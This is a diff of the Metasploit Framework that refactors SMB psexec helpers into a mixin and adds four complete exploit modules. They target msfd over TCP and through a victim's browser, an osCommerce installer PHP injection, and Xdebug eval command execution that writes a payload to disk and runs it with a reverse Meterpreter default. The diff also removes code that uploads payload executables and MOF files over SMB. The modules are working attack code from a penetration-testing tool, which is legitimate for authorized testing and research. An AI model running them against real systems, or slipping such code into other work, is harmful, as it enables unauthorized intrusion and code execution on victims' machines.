#
|
||||
|
@ -487,13 +504,6 @@ module Msf
|
|||
return @@search_opts.fmt.keys
|
||||
end
|
||||
|
||||
case (words[-1])
|
||||
when "-r"
|
||||
return RankingName.sort.map{|r| r[1]}
|
||||
when "-t"
|
||||
return %w{auxiliary encoder exploit nop payload post}
|
||||
end
|
||||
|
||||
[]
|
||||
end
|
||||
|
||||
|
|
|
@ -70,9 +70,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.33'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.34'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.7'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.8'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
|
|
@ -5,6 +5,7 @@
|
|||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -92,119 +93,18 @@ class MetasploitModule < Msf::Auxiliary
|
|||
@ip = ip
|
||||
|
||||
# Try and authenticate with given credentials
|
||||
res = execute_command(text, bat)
|
||||
|
||||
if res
|
||||
for i in 0..(datastore['RETRY'])
|
||||
Rex.sleep(datastore['DELAY'])
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text))
|
||||
break
|
||||
elsif (i == datastore['RETRY'])
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
get_output(text)
|
||||
end
|
||||
|
||||
cleanup_after(text, bat)
|
||||
end
|
||||
|
||||
#
|
||||
# TODO: the rest shamelessly copypasta from auxiliary/admin/smb/psexec_command
|
||||
# it should probably be mixin'd. I have changed some of vprint/print tho
|
||||
# => zerosum0x0
|
||||
#
|
||||
|
||||
# Executes specified Windows Command
|
||||
def execute_command(text, bat)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
vprint_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
# Retrive output from command
|
||||
def get_output(file)
|
||||
vprint_status("Getting the command output...")
|
||||
output = smb_read_file(@smbshare, @ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
|
||||
|
||||
# Report output
|
||||
vprint_good("Command completed successfuly!")
|
||||
|
||||
# zerosum0x0: this is better with Verbose off in this case
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":")
|
||||
print_line("#{output}")
|
||||
|
||||
print_good("Command completed successfuly!")
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":\n")
|
||||
print_line("#{output}\n")
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
vprint_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
# Removes files created during execution.
|
||||
def cleanup_after(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
|
||||
return
|
||||
end
|
||||
vprint_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -69,112 +69,22 @@ class MetasploitModule < Msf::Auxiliary
|
|||
print_error("Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
end
|
||||
res = execute_command(text, bat)
|
||||
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
|
||||
|
||||
if res
|
||||
for i in 0..(datastore['RETRY'])
|
||||
Rex.sleep(datastore['DELAY'])
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text))
|
||||
break
|
||||
elsif (i == datastore['RETRY'])
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
get_output(text)
|
||||
unless output.nil?
|
||||
print_good("Command completed successfuly!")
|
||||
print_status("Output for \"#{datastore['COMMAND']}\":\n")
|
||||
print_line("#{output}\n")
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
end
|
||||
|
||||
cleanup_after(text, bat)
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
# Executes specified Windows Command
|
||||
def execute_command(text, bat)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
print_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
# Retrive output from command
|
||||
def get_output(file)
|
||||
print_status("Getting the command output...")
|
||||
output = smb_read_file(@smbshare, @ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
|
||||
# Report output
|
||||
print_good("Command completed successfuly!")
|
||||
vprint_status("Output for \"#{datastore['COMMAND']}\":")
|
||||
vprint_line("#{output}")
|
||||
|
||||
report_note(
|
||||
:rhost => datastore['RHOSTS'],
|
||||
:rport => datastore['RPORT'],
|
||||
:type => "psexec_command",
|
||||
:name => datastore['COMMAND'],
|
||||
:data => output
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
print_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
# Removes files created during execution.
|
||||
def cleanup_after(*files)
|
||||
begin
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", ")} from the target.")
|
||||
return
|
||||
end
|
||||
print_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -55,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
end
|
||||
|
||||
# This module returns false positives for credentialed logins
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def telnet_timeout
|
||||
(datastore['TelnetTimeout'] || 10).to_i
|
||||
end
|
||||
|
|
|
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. This module connects to the msfd-socket
|
||||
through the victim's browser.
|
||||
|
||||
To execute msfconsole-commands in JavaScript from a web application,
|
||||
this module places the payload in the POST-data. These POST-requests
|
||||
can be sent cross-domain and can therefore be sent to localhost on the
|
||||
victim's machine. The msfconsole-command to execute code is 'rbi -e
|
||||
"CODE"'.
|
||||
|
||||
Exploitation when the browser is running on Windows is unreliable and
|
||||
the exploit is only usable when IE is used and the quiet-flag has been
|
||||
passed to msf-daemon.
|
||||
},
|
||||
'License' => BSD_LICENSE,
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {}],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'DisableNops' => 'True',
|
||||
'BadChars' => "\x22\x0a"
|
||||
},
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
|
||||
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
sc = payload.encoded
|
||||
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
|
||||
var1 = rand_text_alpha(rand(6..11))
|
||||
var2 = rand_text_alpha(rand(6..11))
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<script>
|
||||
var #{var1} = new XMLHttpRequest();
|
||||
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
|
||||
var #{var2} = String("#{shellcode}");
|
||||
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
print_status("#{msg} Sending HTML...")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
|
@ -0,0 +1,100 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'osCommerce Installer Unauthenticated Code Execution',
|
||||
'Description' => %q{
|
||||
If the /install/ directory was not removed, it is possible for an unauthenticated
|
||||
attacker to run the "install_4.php" script, which will create the configuration
|
||||
file for the installation. This allows the attacker to inject PHP code into the
|
||||
configuration file and execute it.
|
||||
},
|
||||
'Author' => [
|
||||
'Simon Scannell', # Original exploit author
|
||||
'Daniel Teixeira' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '44374'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'osCommerce 2.3.4.1', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 30 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'install.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
unless res
|
||||
vprint_error 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('osCommerce Website')
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'index.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res.body.include?('configure.php') && res.body.include?('The following files need to have their file permissions set to world-writeable (chmod 777):')
|
||||
vprint_error 'configure.php is not writable'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def trigger
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'includes/configure.php'),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Appears
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
data = {
|
||||
'DIR_FS_DOCUMENT_ROOT' => './',
|
||||
'DB_DATABASE' => "');#{payload.encoded}/*"
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI'], 'install.php?step=4'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => data
|
||||
})
|
||||
trigger
|
||||
end
|
||||
end
|
|
@ -0,0 +1,66 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. If this socket is accessible on a remote
|
||||
interface, an attacker can execute commands on the victim's machine.
|
||||
|
||||
If msfd is running with higher privileges than the current local user,
|
||||
this module can also be used for privilege escalation. In that case,
|
||||
port forwarding on the compromised host can be used.
|
||||
|
||||
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
|
||||
},
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => "ruby",
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'BadChars' => "\x27\x0a",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(55554)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
data = sock.get_once
|
||||
if data.include?("msf")
|
||||
disconnect
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
disconnect
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.get_once
|
||||
sock.put "irb -e '" + payload.encoded + "'\n"
|
||||
disconnect
|
||||
end
|
||||
end
|
|
@ -0,0 +1,114 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Rex::Proto::Http
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'xdebug Unauthenticated OS Command Execution',
|
||||
'Description' => %q{
|
||||
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
|
||||
This allows the attacker to execute arbitrary php code as the context of the web user.
|
||||
},
|
||||
'DisclosureDate' => 'Sep 17 2017',
|
||||
'Author' => [
|
||||
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
|
||||
'Shaksham Jaiswal', # MinatoTW
|
||||
'Mumbai' # Austin Hudson
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
|
||||
['URL', 'https://paper.seebug.org/397/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'php',
|
||||
'Arch' => [ARCH_PHP],
|
||||
'DefaultTarget' => 0,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Payload' => {
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Targets' => [[ 'Automatic', {} ]],
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
|
||||
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
|
||||
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
|
||||
Opt::RPORT(80),
|
||||
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore["PATH"],
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
|
||||
}
|
||||
})
|
||||
vprint_status "Request sent\n#{res.headers}"
|
||||
if res && res.headers.to_s =~ /XDEBUG/i
|
||||
vprint_good("Looks like remote server has xdebug enabled\n")
|
||||
return CheckCode::Detected
|
||||
else
|
||||
return CheckCode::Safe
|
||||
end
|
||||
rescue Rex::ConnectionError
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
payl = Rex::Text.encode_base64("#{payload.encoded}")
|
||||
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
|
||||
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
|
||||
webserver = Thread.new do
|
||||
begin
|
||||
server = Rex::Socket::TcpServer.create(
|
||||
'LocalPort' => datastore['SRVPORT'],
|
||||
'LocalHost' => datastore['SRVHOST'],
|
||||
'Context' => {
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
})
|
||||
|
||||
client = server.accept
|
||||
print_status("Waiting for client response.")
|
||||
data = client.recv(1024)
|
||||
print_status("Receiving response")
|
||||
vprint_line(data)
|
||||
print_status("Shell might take upto a minute to respond.Please be patient.")
|
||||
print_status("Sending payload of size #{cmd1.length} bytes")
|
||||
register_file_for_cleanup(file)
|
||||
client.write(cmd1)
|
||||
client.close
|
||||
server.close
|
||||
webserver.exit
|
||||
ensure
|
||||
webserver.exit
|
||||
end
|
||||
end
|
||||
send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'X-Forwarded-For' => "#{lhost}",
|
||||
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
|
@ -17,6 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::WbemExec
|
||||
|
@ -119,221 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def smb_pwn()
|
||||
case target.name
|
||||
when 'Automatic'
|
||||
if powershell_installed?
|
||||
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
|
||||
print_status('Selecting PowerShell target')
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
else
|
||||
print_status('Selecting native target')
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
end
|
||||
when 'PowerShell'
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
when 'Native upload'
|
||||
native_upload
|
||||
when 'MOF upload'
|
||||
mof_upload
|
||||
mof_upload(datastore['SHARE'])
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
|
||||
# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to
|
||||
# be moved into a mixin
|
||||
|
||||
def powershell_installed?
|
||||
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
|
||||
|
||||
case datastore['SHARE'].upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = datastore['PSH_PATH']
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
|
||||
vprint_status("Checking for #{path}")
|
||||
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
|
||||
psh
|
||||
end
|
||||
|
||||
def powershell
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = datastore['SHARE']
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = datastore['SHARE'].dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{filename}", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#{filename}...")
|
||||
else
|
||||
print_status("Created \\#{filename}...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if datastore['SHARE'] == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#{filename}"
|
||||
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
|
||||
file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#{filename}...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if datastore['SHARE'] =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{filename} failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if datastore['SHARE'] != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
def report_auth
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
|
||||
port: datastore['RPORT'],
|
||||
service_name: 'smb',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: self.fullname,
|
||||
private_data: datastore['SMBPass'],
|
||||
